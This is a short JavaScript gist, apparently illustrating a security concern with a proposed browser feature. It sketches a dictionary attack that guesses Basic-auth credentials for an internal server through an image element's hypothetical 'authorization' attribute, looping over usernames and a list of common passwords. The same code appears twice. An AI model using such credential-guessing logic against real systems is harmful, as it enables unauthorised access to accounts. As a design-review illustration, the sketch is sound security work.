andreubotella/authorization dictionary attack.js Secret

## authorization dictionary attack.js
const knownUsernames = [
    // A list of likely usernames for known employees of Example Inc.
];
const commonPasswords = [
    "password",
    "passw0rd",
    "password1",
    "password123456",
    "PaSsWoRd",
    // ... etc.
];

async function dictionaryAttack() {
    const img = document.createElement("img");
    document.body.appendChild(img);
    for (const username of knownUsernames) {
        for (const password of commonPasswords) {
            // Let's say we somehow know that internal.example.com/images/my_profile_pic.png
            // exists and is an image.
            img.src = "https://internal.example.com/images/my_profile_pic.png";
            img.authorization = `Basic ${btoa(username + ":" + password)}`;
            try {
                await img.decode();
                return {username, password};
            } catch (e) {
                // Do nothing, let's try the next combination.
            }
        }
    }
}
	const knownUsernames = [
	// A list of likely usernames for known employees of Example Inc.
	];
	const commonPasswords = [
	"password",
	"passw0rd",
	"password1",
	"password123456",
	"PaSsWoRd",
	// ... etc.
	];

	async function dictionaryAttack() {
	const img = document.createElement("img");
	document.body.appendChild(img);
	for (const username of knownUsernames) {
	for (const password of commonPasswords) {
	// Let's say we somehow know that internal.example.com/images/my_profile_pic.png
	// exists and is an image.
	img.src = "https://internal.example.com/images/my_profile_pic.png";
	img.authorization = `Basic ${btoa(username + ":" + password)}`;
	try {
	await img.decode();
	return {username, password};
	} catch (e) {
	// Do nothing, let's try the next combination.
	}
	}
	}
	}